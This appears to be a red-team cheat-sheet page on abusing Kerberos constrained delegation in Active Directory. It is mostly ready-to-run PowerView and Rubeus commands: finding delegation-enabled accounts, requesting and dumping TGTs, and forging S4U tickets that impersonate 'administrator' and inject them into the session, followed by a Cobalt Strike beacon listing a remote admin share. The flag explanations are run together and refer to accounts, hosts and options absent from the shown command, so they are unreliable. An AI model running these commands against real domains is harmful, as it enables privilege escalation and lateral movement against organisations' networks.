Constrained Delegation
Constrained delegation was soon released as a safer means for services to perform Kerberos delegation. It aims to restrict the services to which the server can act on behalf of a user. It no longer allows the server to cache the TGTs of other users, but allows it to request a TGS for another user with its own TGT.


# Verify
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# Generate TGT Ticket With User Credentials
Rubeus.exe asktgt /user:workstation1$ /rc4:<NTLM Hash>
Rubeus.exe asktgt /user:sqlservice /password:P@ssw0rd
# Generate TGT Ticket With User Session OR Dumping
Rubeus.exe tgtdeleg
Rubeus.exe triage
Rubeus.exe dump
# Command
Rubeus.exe s4u /impersonateuser:administrator /msdsspn:time/workstation1.marvel.local /altservice:cifs /opsec /ptt /ticket:<TICKET>
beacon> ls \\wkstn-2.dev.cyberbotic.io\c$
/impersonateuser
is the user we want to impersonate.nlamb
is a domain admin but you want to ensure this user has local admin access to the target (WKSTN-2)./msdsspn
is the service principal name that SRV-2 is allowed to delegate to./user
is the principal allowed to perform the delegation./aes256
is the AES256 key of the/user
./opsec
tells Rubeus to more closely mimic genuine S4U2Self and S4U2Proxy requests (can only be used withaes256
)./ptt
tells Rubeus to pass the generated tickets directly into the current logon session.
Last updated